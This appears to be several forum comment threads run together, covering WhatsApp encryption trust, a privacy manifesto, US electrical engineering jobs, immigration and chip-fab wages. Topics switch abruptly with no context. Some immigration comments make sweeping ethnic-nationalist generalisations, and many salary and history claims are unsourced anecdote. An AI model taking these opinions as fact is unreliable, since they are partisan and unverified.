By that standard, it can never be verified because what is running and what is reviewed could be different. Reviewing relevant elements is as meaningful as reviewing all the source code.
Let’s be real: the standard is “Do we trust Meta?”
I don’t, and don’t see how it could possibly be construed to be logical to trust them.
I definitely trust a non-profit open source alternative a whole lot more. Perception can be different than reality but that’s what we’ve got to work with.
What you are saying is empirically false. Change in a single line of executed code (sometimes even a single character!) can be the difference between a secure and non-secure system.
This must mean that you have been paid not to understand these things. Or perhaps you would be punished at work if you internalized reality and spoke up. In either case, I don't think your personal emotional landscape should take precedence over things that have been proven and are trivial to demonstrate.
as long as client side encryption has been audited, which to my understanding is the case, it doesn't matter. That is literally the point of encryption, communication across adversarial channels. Unless you think Facebook has broken the laws of mathematics it's impossible for them to decrypt the content of messages without the users private keys.
Well the thing is, the key exfiltration code would probably reside outside the TCB. Not particularly hard to have some function grab the signing keys, and send them to the server. Then you can impersonate as the user in MITM. That exfiltration is one-time and it's quite hard to recover from.
I'd much rather not have blind faith on WhatsApp doing the right thing, and instead just use Signal so I can verify myself it's key management is doing only what it should.
Speculating over the correctness of E2EE implementation isn't productive, considering the metadata leak we know Meta takes full advantage of, is enough reason to stick proper platforms like Signal.
> That exfiltration is one-time and it's quite hard to recover from.
Not quite true with Signal's double ratchet though, right? Because keys are routinely getting rolled, you have to continuously exfiltrate the new keys.
No I said signing keys. If you're doing MITM all the time because there's no alternative path to route ciphertexts, you get to generate all those double-ratchet keys. And then you have a separate ratchet for the other peer in the opposite direction.
Last time I checked, by default, WhatsApp features no fingerprint change warnings by default, so users will not even notice if you MITM them. The attack I described is for situations where the two users would enable non-blocking key change warnings and try to compare the fingerprints.
Not saying this attack happens by any means. Just that this is theoretically possible, and leaves the smallest trail. Which is why it helps that you can verify on Signal it's not exfiltrating your identity keys.
Ah right, I didn't think about just outright MitMing from the get-go. If WhatsApp doesn't show the user anything about fingerprints, then yeah, that's a real hole.
Not that I trust Facebook or anything but wouldn’t a motivated investigator be able to find this key exfiltration “function” or code by now? Unless there is some remote code execution flow going on.
WhatsApp performs dynamic code loading from memory, GrapheneOS detects it when you open the app, and blocking this causes the app to crash during startup. So we know that static analysis of the APK is not giving us the whole picture of what actually executes.
This DCL could be fetching some forward_to_NSA() function from a server and registering it to be called on every outgoing message. It would be trivial to hide in tcpdumps, best approach would be tracing with Frida and looking at syscalls to attempt to isolate what is actually being loaded, but it is also trivial for apps to detect they are being debugged and conditionally avoid loading the incriminating code in this instance. This code would only run in environments where the interested parties are sure there is no chance of detection, which is enough of the endpoints that even if you personally can set off the anti-tracing conditions without falling foul of whatever attestation Meta likely have going on, everyone you text will be participating unknowingly in the dragnet anyway.
"Many forms of dynamic code loading, especially those that use remote sources, violate Google Play policies and may lead to a suspension of your app from Google Play."
I don’t know these OS’s well enough. Can you MitM the dynamic code loads by adding a CA to the OS’s trusted list? I’ve done this in Python apps because there’s only 2 or 3 places that it might check to verify a TLS cert.
>Not that I trust Facebook or anything but wouldn’t a motivated investigator be able to find this key exfiltration “function” or code by now?
Yeah I'd imagine it would have been found by know. Then again, who knows when they'd add it, and if some future update removes it. Google isn't scanning every line for every version. I prefer to eliminate this kind of 5D-guesswork categorically, and just use FOSS messaging apps.
The issue is what the client app does with the information after it is decrypted. As Snowden remarked after he released his trove, encryption works, and it's not like the NSA or anyone else has some super secret decoder ring. The problem is endpoint security is borderline atrocious and an obvious achilles heel - the information has to be decoded in order to display it to the end user, so that's a much easier attack vector than trying to break the encryption itself.
So the point other commenters are making is that you can verify all you want that the encryption is robust and secure, but that doesn't mean the app can't just send a copy of the info to a server somewhere after it has been decoded.
None of my opinions of this manifesto are positive. This is a defeatist position. It dangerously conditions people to be more casual about their privacy and safety.
There are still legitimate reasons to clear cookies, to turn off Bluetooth/NFC beaconing, and to occasionally rotate passwords (vis a vis password managers) as it costs nothing to accomplish, and very little in the way of tradeoffs. So...why not?
The probability of a random individual being the target of a sophisticated state sponsored attack is low, but the probability of being caught up in a larger dragnet and for data to be classified, aggregated and profiled is very high. So why not make it just a bit harder for them all?
If anything, let's chip away at this problem bit by bit. Make their life a bit harder...their datacenters a bit hotter. Add random fud to the cookie values, constantly switch VPN endpoints, randomize your mac address on every WiFi association, constantly delete old comments, accounts, create throwaway accounts, create proxies and intermediaries, rotate your password and 2FA -- use any legal means to frustrate any adversarial entities -- commercial or otherwise. They want information? They want your data? Fine, overwhelm them with it. THAT should be the proper modern privacy-focused manifesto. This is utterly bewildering...
...but then I get to the signatories and this nonsense suddenly made all the sense in the world:
> Sincerely, Heather Adkins, VP, Cybersecurity Resilience Officer, Google
> Aimee Cardwell, former CISO UnitedHealthGroup
> Curt Dukes, former NSA IA Director, and Cybersecurity
Executive
> Tony Sager, former NSA Executive
Why would (should) they? The tarrif is biggest contributor to the would-be price increase, and they want to offload the blame to the policies that enacted it.
Why do you think you get a breakdown of governmental fees in your electric or phone bill, but not the tax subsidies?
The 'brain drain' (as you refer to it) stems from intelligent/motivated grads in the US for the last two decades (at least) pursuing more lucrative fields like finance and adtech (re: Google, Facebook). Or some pursue management route (attending big MBA schools and switching to management roles where they climb corporate ladder). In other words, there are not a lot of college/grad students who want to pursue traditional engineering routes in the US.
I myself was an electrical engineering (EE) major until I switched to computer science in my third (junior) year of college because like a friend of mine at the time told me, "<my name>, if you don't major in computer science, you will not be able to find a job easily after graduation". He was right. All of my former college friends in EE ended up pursuing programming jobs (a few of them now works for FAANG; I used to work for one but left a year ago due to RTO). That is why the US has no sufficient personnel to do traditional engineering jobs and we have shipped off a lot of those to foreign countries.
I'm a EE and had no problem finding a job and neither did any of my classmates in my EE program (early 2010s). I also didn't exactly go to anything approaching MIT, but it was an engineering school and I had a decent GPA. Particularly, there are a lot of well paying jobs in power systems with good work life balance. We have an energy transition going on, so that helps. Having an internship probably helped me too. I acknowledge that things might have broadly changed.
> there are a lot of well paying jobs in power systems with good work life balance
How much electrical engineering is there in these jobs? I knew a few electrical engineer at university (weirdly they outnumbered the software engineers 3 to 1) and some of them told me they could get work for a local power company, but it was mostly looking at spreadsheets and not really using anything that they'd learned.
It depends on what exactly you do as the industry is so vast.
It is true (I'd wager this is true in most engineering fields) that very few actually use a lot of what you learned in school as it has all been put into fancy software packages. For example, my wife uses some kind of drafting software to design things like roads that she learned all the math to understand in college. It is the same in my industry where yeah, you use a lot of spreadsheets and Python scripts and SQL to help automate software and analyze the results. In a lot of cases you don't really need an engineering degree, but it helps a lot in understanding what is going on when the results don't make sense. Getting the engineering degree is also just really good training for the kind of rigorous thought processes needed for solving open problems.
There are also plenty of jobs in power that are closer to what you would consider engineering. For example, you might have to go to the substation switch yard, help supervise a crew installing new transformers, help design a microgrid...etc.
I'll add that it is pretty common for engineers to have some kind of existential crisis once you graduate and you realize what you thought you'd be doing once you graduated (in my case crawling around Jefferies tubes and fixing the warp reactor) is totally different in the real world. It's kind of similar in computer science where most graduates are basically just gluing library code together instead of writing their own software from scratch in C. I recall reading somewhere that the famous SICP course moved from Scheme to Python precisely because of the change in how people coded now.
> I'll add that it is pretty common for engineers to have some kind of existential crisis once you graduate and you realize what you thought you'd be doing once you graduated (in my case crawling around Jefferies tubes and fixing the warp reactor) is totally different in the real world.
Thank you for saying this out loud. It took me years to recover from this, and I "recovered" mostly by giving up and accepting that, unlike fiction, real world doesn't have to make sense or offer interesting, fulfilling work.
Now I just dream that one of these days, I'll build a house, and I'll design it with a Jefferies tube, just to scratch my itch.
I'm with you there friend! To continue the Star Trek analogies, I think a lot of modern day engineers (mind you not all) are at least partially just business folks, but instead of being Ferengi we have a more Vulcan like mindset and fill a different niche within the business in understanding the technical side of things in a way that few have an aptitude/interest for.
I work a lot with electricity markets though and find it to be very interesting and challenging as the field is surprisingly vast and incredibly dynamic. It requires knowledge of power fundamentals as well as economics, operations research, and honestly history. It isn't at all what I thought I would do back when I was in highschool, but a pleasant surprise all the same. I do sometimes get the itch to be like the guy that invented the lotus office software who lived in a cabin in the woods somewhere and implemented his own product, but the software market is already saturated in this space. Also, I have a family now which prevents my hermit dream and that is yet another wonderful surprise and has been very fulfilling as well as maddening at times :)
Similar qualifications here, but no internships. Couldn't find anything after grad school in the early 2010s (and still nothing in the mid 2010s after trying again). Went into telcom and I'm a happy little coder now. Nice to actually feel appreciated in this field compared to EE where it felt like I was always working my butt off for scraps.
I was focused on finding something entry-level. Did a non-thesis masters focused on mixed signal / RF design and R&D didn't really appeal to me at the time
I don't know if there is a somber write up. But from what I have heard from a lot of people, is that jobs designing and making say PCB boards and electronic circuits just don't exist. They are all in Shenzhen. Those American firms that have American engineers still, seem to all involve flying to those factories to help fix problems, and are dead end jobs. At least thats my impression.
Having known several great EEs in FAANG who did exactly that job, sometimes paying Chinese income tax due to the length of their stays at the factory, that is my impression as well.
Chip design/semiconductors/etc. have been a dead end in the US for 30+ years, but EE is a broad field and other specialties like RF/power systems/anything defense related are still in high demand. An EE with a PE will have an infinitely easier time getting a job working at a utility or engineering firm than any software developer these days to be honest.
Limited to non existent jobs. Not much else to say, the jobs like so many others have been exported. Taiwan and China being the electronics and manufacturing centers means design has steadily moved as well. Ask any board house in the west how things are going, the ones that are left that is.
It would help if they didn't charge $50 for a single raw PCB in low quantity when I can have the same board not just made, but also assembled in China for a fraction of that, shipping included. Literally.
I've often wondered if that's some kind of industry inertia issue, or if there's some underlying additional cost to build in the US.
People here cost a little more. No one here does quite the volume jlcpcb likely does. Perhaps there’s some artificial market factor as well like CCP tends to weigh some scales. There’s board assembly machines made in china as well likely further reducing the cost to build out assembly lines. Perhaps cheaper sources of basic materials like copper.
Likely multitudes of factors at play all of them in favor of China
I could buy that to some degree, but not to the current insane level of price disparity.
PCB production should be one of those things that is or can be mostly automated if it isn't already. Assembly is definitely already a mostly automated process. This is all existing tech. Thus the cost differential doesn't seem justifiable.
I have to think that this is very much "build it and they will come" territory if you can get within 1.5x to 3x the price, so it continues to boggle my mind that nobody has managed to make it happen.
The only blocker I can truly identify is the magnitude of the initial investment. That doesn't explain why the prices at domestic board houses seem to have remained pretty much exactly the same for the last couple of decades, though.
As far as I can tell, they just don't want the business.
The personnel that swaps part dispenser blades in the USA costs more. What's there to understand?
Automated assembly still has setup costs that take real humans walking around physically.
It's more likely that the Chinese companies are offering prototyping at a loss, because they know people won't switch to a different board house, once the prototyping phase is over.
Software jobs are more plentiful, sure, but you’re discounting the extremely high quantity of EE/CE jobs available at semiconductor companies (Intel, AMD, and many smaller ones) and companies like Apple. They don’t pay as well, but they can pay quite good over time and tend to be more stable than software jobs.
It's not even brain drain, America's dominance came from the fact that for nearly a century the brightest people in the world were willing to give up everything to come here. That is no longer the case. Today's Einstein probably isn't going to immigrate here.
I just want to point out that germany and US have a similar number when adjusted to it's respected population size (I think it's even a little bit higher).
Exactly. Something is penalizing or inhibiting manufacturing in developed countries. That something is just regular progression on the ladder of classical infinitely extending three-sector model[1] and gradual obsolescence of its lower rungs, but that is problematic, and without healthy preceding sectors for each, it's just a measuring contest being held in a skydiving.
Einstein didn't emigrate to get rich, he emigrated because the Nazi's took over Germany. Germany had the best universities in the world before they took the path of self-destruction. So that was a second, separate event that helped America.
Well, hopefully nothing like that happens in the US - that is to say an ideologue that ruins a country by ostracizing and then removing skilled immigrants or deters them from coming in the first place. Perhaps we can examine some recent large scale survey data to determine if the US populace gives a shit.
For all I shit relentlessly on this country and its culture, it's still an extremely attractive place to live if you're well-situated to make money. (Most people are not—hence my contempt for how the society functions. This presumably DOES apply to an "Einstein", if indeed this Einstein wants money.) China still has a way to go in catering to and granting citizenship (or some amenable equivalent) to foreigners.
You have the metaphor backwards. Where do you go if you're a talented American and your own country continually does not want to pay for your talent? It's the brain drain out of the US to worry about, not the influx of immigration.
> Where do you go if you're a talented American and your own country continually does not want to pay for your talent?
China is the only country that pays even remotely competitively. Yes, even including all the nice benefits of living in a european welfare state, yes including the other anglo colonies.
Makes sense, it's just basic economy to pay for spent and get it. Something the US is continually giving up.
Still, their culture basically does make it so certain types of people simply can't exist there. And I hear there's a healthy dose of racism as well. Nothing unique to China, sadly.
You make a good point about China. It’s still an ethnostate, and I don’t see how it can reconcile such a strong ethnic nationalist identity with its own demographic crisis and competition for labor from abroad.
The US didn't win World War 2, break the sound barrier, or put a man on the Moon only or primarily due to immigrant workers. We scoured the country's public school system for the sharpest young minds, sent them to institutions of higher learning with rigorous curricula, and found them positions in industry, government, or the military which made good use of their talent. Fetishizing the "nation of immigrants" narrative at the expensive of the native-born Americans who actually built most of this country's prosperity is, at best, ahistorical.
We literally put a man on the moon because we acquired Werner Von Braun and used his plans... I mean, we probably would have eventually done it, but the timeline likely would have been different and the soviets might have beaten us to the moon, but the time line we are in, we had a space program as successful as it was because we acquired German scientists who were already thinking about these problems a even a decade or so before we started to invest into it.
1,200 men of the same ethnic and religious background of the median American, brought over in a one-time arrangement in the wake of the most destructive war ever fought, versus 100,000 Indian H1B visas granted annually. That's just India, not counting other countries or visa types. Okay. Sure. Totally the same. We couldn't have made it back to the Moon without a million indentured IT workers.
I really have no clue what you're trying to say. You presented as a bad historical example for your argument, landing on the moon. I showed how that was a flawed example and now you're talking about a people from India in IT and the Artemis program and an accomplishment of it that hasn't even happened yet. Looks like your trying to pick an argument of H1B visas with my comment that had no mention of it.
>Fetishizing the "nation of immigrants" narrative at the expensive of the native-born Americans who actually built most of this country's prosperity is, at best, ahistorical.
Except many of us can trace our family lines to immigration. On one side I have to go back to the early 1800's to see when they immigrated, but this is literally a country of immigrants. (other half of the family is late 1800s/early 1900s immigration)
Even today I would assume the average American doesn't have to trace back more than 100-150 years to see when part of their family moved here.
>We scoured the country's public school system for the sharpest young minds, sent them to institutions of higher learning with rigorous curricula, and found them positions in industry, government, or the military which made good use of their talent.
Don't even get us started on ahistorical nonsense when you just want to make things up. Not when talented folks[0] had to work through system that didn't want them so they could eventually make all the difference.
I hear you, I took umbrage with that comment as well. But I think it’s fair to consider whether we are doing enough for Americans just as we are welcoming newcomers to settle here at the same time? My experience as a native born Californian, raised by a single immigrant mother living in urban poverty is no, we do not. Granted I escaped poverty by self-funding my engineering education (Federal Loans and working full time) but it took the better part of my 20s to do so, at great personal cost and risk. In many ways that experience taught me just how unfairly stacked the odds are against the working poor, let alone their children.
I am really curious how welcoming do you think US is to new comers.. Most of the early immigrants in 1800s and early 1900s were blue collar workers (exactly like the people coming from the south of the border). Do you think there is any part of the system that is welcoming to them?
The brain-drain from the rest of the world to US started only after WW2 when US became the only industrialized country with a viable student -> employee -> citizen path and even that only works for a very small set of people.
I would love to hear about programs where the newcomers are treated better than you as a native citizen when both of you are equally qualified.
Our German scientists were better than their German scientists. We had no real science PhD programs until the 1920's. We had no scouting for young minds until the 1950's.
> Fetishizing the "nation of immigrants" narrative at the expensive of the native-born Americans who actually built most of this country's prosperity is, at best, ahistorical.
Most of those native-born Americans were the children or grandchildren of immigrants.
What do you think a nation is? Is it a sports team or economic zone that hands out name tags to whoever steps off the boat with the right attitude? Or is it a specific group of people in a specific place with a shared language, lineage, culture, history, faith, and common destiny? I submit to you that it's the latter, and no empire nor state organized as the former can endure.
> Or is it a specific group of people in a specific place with a shared language, lineage, culture, history, faith, and common destiny?
I'm American, so I've never lived in this kind of nation.
> no empire nor state organized as the former can endure.
Looking at many of the longer-lived nations and empires of the past—having a shared language, lineage, culture, history, faith, common destiny? They had none of those. They were a conglomeration of people speaking different languages, from different lineages, with different cultures, different histories, and practicing different faiths.
The USSR never did pay us back for the massive, unprecedented, war-winning aid we delivered to them under Lend-Lease. Half a million trucks, thousands of tanks, tens of thousands of airplanes, millions of tons of food. And what did we get out of it? An implacable evil empire that sat like a boot on the neck of Eastern Europe for another 50 years after our "victory."
A total of $50.1 billion (equivalent to $672 billion in 2023 when accounting for inflation) worth of supplies was shipped, or 17% of the total war expenditures of the U.S.
In all, $31.4 billion went to the United Kingdom, $11.3 billion to the Soviet Union, $3.2 billion to France, $1.6 billion to China, and the remaining $2.6 billion to other Allies.
Material delivered under the act was supplied at no cost, to be used until returned or destroyed.
In practice, most equipment was destroyed, although some hardware (such as ships) was returned after the war.
Supplies that arrived after the termination date were sold to the United Kingdom at a large discount for £1.075 billion, using long-term loans from the United States, which were finally repaid in 2006.
Similarly, the Soviet Union repaid $722 million in 1971, with the remainder of the debt written off.
This is all correct. It’s also hard to believe that any other country could have sustained the casualties the USSR took and it saved lives for the other allies by diverting troops to the Eastern Front. The US had nearly 500k deaths, the USSR (post war borders) had something like 26 million.
Both sides needed each other. From a US perspective, trading money for lives likely seemed worth it.
The USSR was an objectively terrible regime, and most the Russian governments that have followed on from it have been too. Underestimating the deaths Russian leadership is willing to tolerate has proven unwise a few too many times.
If you only came across ten thousand years ago, you are just a colonist that killed and displaced the people who came across sixteen thousand years ago. But that said, native born has a definition, and it is where you were born, not where your parents, grandparents or grand^14 parents was born.
my grand^10 parent's didn't exactly "immigrate" her per se. They were "invited". I guess they were "persuaded" to help fight the occasional war though.
It is kind of disingenuous and dishonest to say that there is no value or meaning on those Americans born in American soil, a nation should prioritize the people that live on it or well at least care for them and make them useful for nation building in the future.
Canada has proven that importing punjabis for almost two decades and ignoring the local people is not effective. So yeah there is a meaningful difference and saying native born in this context allows us to steer the conversation towards taking care towards those in the country already, which is something that neolib governments have not done in the last decades.
I say this as a person that was not born in the country he resides in now, but saying "calling yourself "native born" doesn't mean a thing " is a dishonest way to try to dissuade and delete necessary words that work towards more fruitful conversatons about how to improve th esytems in North America.
>Canada has proven that importing punjabis for almost two decades and ignoring the local people is not effective.
Curious, that's what Americans once said about the Irish and the Italians and the Germans and the French and the Poles and the Chinese and Jews and Catholics and Muslims and so on and on ad nauseum.
It's just a generational crab mentality born from xenophobia. Every new wave of immigrants decides they're "native" as soon as the next wave shows up. None of them are any more native than the others.
This type of solipsistic kumbaya slop is running face-first into reality, fast. People are different. Groups of people are different. Nations of people can be very different. They differ in meaningful and important and obvious ways. You'll live to see these differences continue to manifest in ways that will doubtless surprise you.
And the Ellis Islanders were at least mostly Christian, white, European. They shared a common cultural, historical, religious, and racial frame with native-born Americans. They could and did meaningfully assimilate. Despite this, that wave of migrants almost broke us. Anarchy, terrorism, riots, organized crime, et cetera. The Johnson-Reed Act was passed in response in 1924 and it slowed immigration to a crawl until the 1960s.
Today we have immigrants who speak utterly alien tongues, with no shared history or civilized tradition, arriving at breakneck pace, and who barely learn English because they can scrape by with apps and translation services, who stay in the cultural bubble of their country of origin, who don't see an American culture worth assimilating to. Especially among so-called high skill immigrants, they pick up a US passport and immediately see me as a worse or lesser "American" than they are. That's nuts. The melting pot, if one ever existed, has broken down. What's happening now is something quite different, and it's not good for me or my fellow Americans.
It seems like you have misread my comment and think I have a particular thing against any group of people.
That is simply not the intention of the comment, if you read correctly you will note that what I meant is that you need to take care of your own people, something that the United States ACCOMPLISHED from the fifties until before Reagan.
I am just not more native than an Indian or Italian person that just like me came a few decades ago. However to pretend there is no difference between me and someone whose family has been here for decades or centuries... that is dishonest.
Why do you call Xenophobia to prioritize giving good jobs to the local population ? It seems like your reading comprehension as well as your definition of Xenophobia is deeply, deeply flawed. We can have immigration that makes sense. Like what Canada used to have...
We should prioritize those that have been for decades in a country and those whose families have paid taxes for multiple generations, there is absolutely nothing xenophobic about that.
If you want to pick an era of technological progress to make that point maybe don't pick the one that involves America becoming a superpower by putting a bomb invented by Jewish refugees on a rocket build by ex Nazi scientists after a physics revolution where be basically got to go and take all of Germany's top talent lol
Alternate explanation: electrical engineering is actually really hard and some parts of computer science look comparatively easier. Plus coding is startups is cool, EE is still nerd as in Nerd.
Well yes, that's why China's in the lead. We willingfully gave it up because corporate decided it was too expensive to pay american talent. They started the death spiral towards "No American wants to work in EE anymore".
I disagree. From what I've seen, the lower level you go, the more advanced it is seen by other developers. As the copypasta goes:
At the beginning, there was Purusha. From his face, born was the Brahmin, the priestly caste, the tooling creator, one who develops programming languages, compilers and standard libraries.
From the arms of the Purusha, Kshatriya, the warrior caste, was born. Kshatriya is the developer of systems software; operating systems, database engines, graphics drivers and high performance networked servers.
Then comes the Vaishya, the merchant caste, the Application developer, who was born from the knees of Purusha. From the feet of Purusha, the fourth varnā, Shudrā, the system administrator, was born. Shudrā serves the above three Varnās, his works range from administrating computers in bureaucratic organizations to replying to support requests.
that's by other developers, but I think in the mainstream know nothing culture people have an image of "coding" that's more prestigious and hackery than EE?
Hard and well paid gets a flood of people pursing it so difficulty can't be the only explanation. Finance, actuarial science, medicine, and law get plenty of applicants. I think it's that CS is an office job that pays well and is in-demand.
I studied both, can't say for sure EE was harder. Some courses in computer science were extremely hard for me (complexity, discrete math) and some courses in EE engineering were equally hard (most of the physics courses, analog circuits and more)
Both degrees can be made super hard, as hard as the school desires them to be...
Nah I did EE and then CompE (which was just replacing some later EE classes with hardware design stuff) and EE is not "actually really hard" - although people like to put it on a pedastel.
I never studied the hard sciences very seriously, although I feel like in retrospect I could have done so at much lesser proficiency than someone with much more encouragement, discipline, and interest, so my path of starting with web/software and then diving into electronics and EE would feel quite different
Hit the nail on the head. I went to the College of Nanoscale Science and Engineering in Albany for a master's in "nanoscale engineering" which essentially boiled down to a master's in being a fab line manager. I finished the degree since it was only a 3 semester program and I was getting paid for research work, but almost immediately after chatting with alumns that went to go work at IBM/Intel/etc it was pretty clear that software engineering was a much more lucrative and less stressful career.
Definitely true, as there weren’t EE jobs here. Now that we’re moving chip manufacturing back, and with programming job market being saturated, perhaps it will shift and EE will pay more due to being more in demand
The jobs needed for chip manufacturing aren’t primarily EE. It’s largely chemical engineering with specializations related to semiconductor tech. EEs use the tools developed by fabs to make their products, but those are typically separate companies (or, in the case of in-house fabs like Intel, basically run as separate companies).
I suspect the kinds of salaries that's possible in Silicon Valley only happens because:
(A) Skills are fairly transferable.
(B) There is a lot of employers competing for workers.
(C) An awful lot of value is created along the way.
If you specialize in some tiny part of chip manufacturing, there aren't many places you can transfer your skills.
Even if, in the future, you have multiple chip vendors. They won't all use the same processes, and you might only fit into one role at each of these businesses.
Maybe it's not that simple. But few chip companies have to compete against startups for workers. And that probably won't change.
Not saying the jobs can't be well paid, just that it's not unlikely that it won't be absurd SV level salaries.
> Maybe it's not that simple. But few chip companies have to compete against startups for workers. And that probably won't change.
It seems like what EE needs is something similar to open source, so that does happen.
The way things like Google or AWS got started is they started with Linux and built something on top of it, so it could be a startup because they don't first have to build the world in order to make a contribution, and they're not building on top of someone else's land.
There isn't any reason that couldn't inherently work in EE. Get some universities or government grants to publish a fully-open spec for some processors that could be fabbed by TSMC or Intel. Not as good as the state of the art, but half as good anyway.
Now people have a basis for EE startups. You take the base design and tweak it some for the application, so that it's a startup-sized job instead of a multinational-sized job, and now you've got EE startups making all kinds of phone SoCs and NVMe drives and Raspberry Pi competitors and whatever else they think can justify a big enough production run to send it to a fab and sell it to the public.
An interesting license for this could be something along the lines of: You can make derivative works, but you have to release them under the same license within five years. In other words, you get five years to make money from this before it goes into the commons, which gives you the incentive to do it while keeping the commons rich so the next you can do it again tomorrow.
The startup costs are probably astronomically higher for a startup doing custom chips. Even if you're fabless.
There is probably also a lot fewer customers.
There is no shortage of businesses and private people who need a CRUD app to track something. We probably won't run out anytime soon :)
And even then, there is probably also a long list of factories that would like to automate something using robots and software.
How many use cases for custom SOCs are there really?
It's a lot cheaper to customize the software, than it is to customize the hardware. Which is kind of the point.
RISC-V is the ISA, which is a solid first step. What you need is a production-ready fully open source whole device, so that someone who wants to fork it only has to change the parts they need to be different instead of having to also re-engineer the missing components.
I think your explanation about large numbers of motivated students pursuing lucrative Non-STEM degrees is incomplete without mentioning the cost of an undergraduate and graduate STEM education in the USA.
The most critical shortages of STEM graduates are in roles requiring advanced degrees. Your median undergraduate education (~$40k) and median graduate education (~$60k) saddles students with approximately $100k in unforgivable student debt! Never mind the years lost that one could otherwise be working. So it’s no wonder students are motivated by the ROI of their degrees, it’s why I chose Computer Engineering over Electrical Engineering.
These are expensive STEM degrees which students on visas are all too willing to pay for a chance at a residency and a pathway to citizenship. So no wonder the majority of undergraduate and graduate STEM students are foreign born in the US. The ROI is not worth it for the debt. We don’t have enough need based scholarships available to finance the STEM graduates this country claims it needs.
> I myself was an electrical engineering (EE) major until I switched to computer science in my third (junior) year of college because like a friend of mine at the time told me, "<my name>, if you don't major in computer science, you will not be able to find a job easily after graduation". He was right. All of my former college friends in EE ended up pursuing programming jobs (a few of them now works for FAANG; I used to work for one but left a year ago due to RTO).
Nothing against you looking out for your future, but this is exactly what I describe to people when I say the industry has changed. It used to be nerds who were very passionate. Now it’s full of people who are just doing a job.
My hot take as to the reason EE is a bit of a dead end in the US is that the options outside of the handful of primary employers are limited. It is very capital intensive to run a semiconductor fab, design chips or assemble electronics at scale. Therefore the employer has all of the leverage. The equipment and/or factory worker infrastructure comes first and the engineering teams are just a cog.
Compare that to having all the degrees of freedom as a computer science student to start up a niche mobile app or internet based niche service after working at FAANG for 5-6 years. Even AI infrastructure will eventually go down in price making niche AI first startups a possibility. In finance its the same, as a post i-banker you have the option to start a boutique fund, a niche fintech or just invest your own savings.
Really appreciate this comment and perspective! In the larger context of immigration and brain drain in other countries, how the US also has one, but of a different kind. Ultimately, it's a loss of potential. I'd somewhat disagree with the directionality of the correlative/causal relation, though. But what can be said is that the US also experiences a knowledge drain towards plainly lucrative jobs. I'd wager that it was/is a cyclical effect that just worsened over the decades and that neither engineers moving to fintech nor low-paying engineering jobs were/are the sole reason.
What you said seems contradictory. You open with the premise that intelligent youth go the finance / CS / MBA path instead of engineering and then say that those who do go into traditional engineering can’t find jobs. Couldn’t it be that people don’t go into engineering because there aren’t any jobs? Wouldn’t the lack of jobs explain the low salaries and thus the preference for more high paying alternatives?
I read the main problem with hiring chip factory workers in Arizona was the factory just didnt pay enough for the long hours demanded. I looked up the median salary and its only 50k so I'm assuming it's not crazy skilled labor (e.g. brain drain). Taiwanese workers just seem more willing to do it.
I spoke to a Taiwanese person and apparently the salaries there are actually quite good, even by western standards (normal ones; not SF). The downside is they have very very long hours (996, barely any holiday, etc.).
It's also highly-skilled, yet very boring work. The way it was described to me is that every major piece of equipment has a PhD assigned to it and their job is basically to babysit the machine and troubleshoot when things go wrong.
US PhDs typically have other options and would consider this sort of work a waste of their time.
I know several people working as customer engineers in a fab based in America. They are very much not PhD‘s or even mechanical engineers.
They are each assigned one tool to maintain as you said. They each make around 100K and 3 12hr days per week.
They were working in the automotive industry before these jobs. Sounds pretty damn good to me, but I suppose that’s one reason American companies cannot compete with TSMC.
> every major piece of equipment has a PhD assigned to it and their job is basically to babysit the machine and troubleshoot when things go wrong
This works in Taiwan. It doesn’t in America. The Taiwanese workers will help transfer knowledge to American workers; it will be the joint responsibility of them both to come up with how those processes are adapted for American preferences. (Probably more automation, rotation between machines or possibly even not being under TSMC.)
I mean, that was exactly the way the job was described when I interviewed at Intel for a process engineer, and everyone doing the same job was at the time a PhD according to the interviewer. Did it change?
Being on call 24/7 to troubleshoot million dollar pieces of equipment sounded like a poor life choice, so I didn't take it. But Intel also hasn't exactly done great since then...
> was exactly the way the job was described when I interviewed at Intel for a process engineer, and everyone doing the same job was at the time a PhD according to the interviewer. Did it change?
Not sure. What has changed in recent years is the quality of industrial automation, particularly in semiconductors.
I'm unconvinced the only way to make these chips is for highly-trained engineers to caramelise onions on the stove. (At the very least, they could be allowed time to conduct experiments into new production methods, et cetera. Similar to how universities let professors do research in exchange for putting in teaching hours.)
> The way it was described to me is that every major piece of equipment has a PhD assigned to it...
did they mean that literally or just that an expert was assigned to it? What kind of PhD would even be relevant to maintaining machinery on an assembly line? Perhaps a PhD on the operations of that specific machine but even then, the person's knowledge would be so focused on whatever physics/chemistry/science is being used that i find it hard to believe a PhD would know what to do when something broke without tons of specific training on the hardware.
A PhD is really just a project in an academic setting.
There’s likely little real world difference in capability between someone with first class honours and a year in industry, than first class honours plus a PhD.
I mean, it's a long, specialized project. It really depends on the specialization. a new grad with a PhD in some LLM tech would be grabbed up much faster than a hobbyist with 5+ years in general SWE with maybe some pet projects made with AI tech.
> he way it was described to me is that every major piece of equipment has a PhD assigned to it and their job is basically to babysit the machine and troubleshoot when things go wrong.
Yes.
"It’s the Most Indispensable Machine in the World—and It Depends on This Woman"
Not just long hours right? Speaking to Taiwanese friends involved in semiconductor work (not TSMC employees though) it's the shift work that's really hard to manage in the US.
50k is/was recently a decent salary (not SF). In the last 5 years, not so much anywhere outside the absolute lowest CoL areas.
But yes, most Americans do not want to work on a death march. And employers don't want to pay it. I doubt they can argue 50k as exempt so that's a lot of overtime. They may as well be salaried 6 figures at that point.
Why would they require these hours? In the U.S. I think they would need to pay time and a half for anything north of 40-hours. Seems like it would be cheaper to hire more workers and not force the overtime. Then they might be able to increase the salary some. Everyone wins except the people who are willing to sacrifice the time for time and a half pay.
This is only accurate inasmuch as most salaried employees are overtime exempt for other reasons (e.g. because they are executive or administrative professionals). Paying employees a salary, on its own, does not make them overtime exempt.
One that comes to mind is an on-site caretaker position (e.g. on a remote property), where the employee is effectively being paid to be available, not to do a certain number of hours of work.
50k is just a step above McDonalds these days in a lot of areas. Sure minimum wage might be $15k, but realistically nobody pays that little except in very rural areas (if you need a small number of low skilled employees a small rural town is a perfect spot to build - but if you need more than a small number they can't provide more at any price - you will pay more in the city but there are a lot more people around if you need more)
AZ minimum wage is 14.70. If it was 996 and you somehow only got straight time for working 72h a week, it would pay 55000. Assuming there's no overtime exemption it would be $67000. I'm pretty sure it's not a 996 in AZ.
By how much? Where I live in IA McDonalds is starting at $17/hour, which is not that much behind California. (and both states are large enough to expect some variation depending on where you live)
That's why manufacturing offshored in the first place, companies feel they're receiving better value for money on wages elsewhere for this kind of work (and these days not to mention more & larger facilities, proximity to component sources, and a strong ecosystem of supporting and complimentary facilities).
I think that's obviously a major part of it but it ignores other stuff like lax environmental and safety standards.
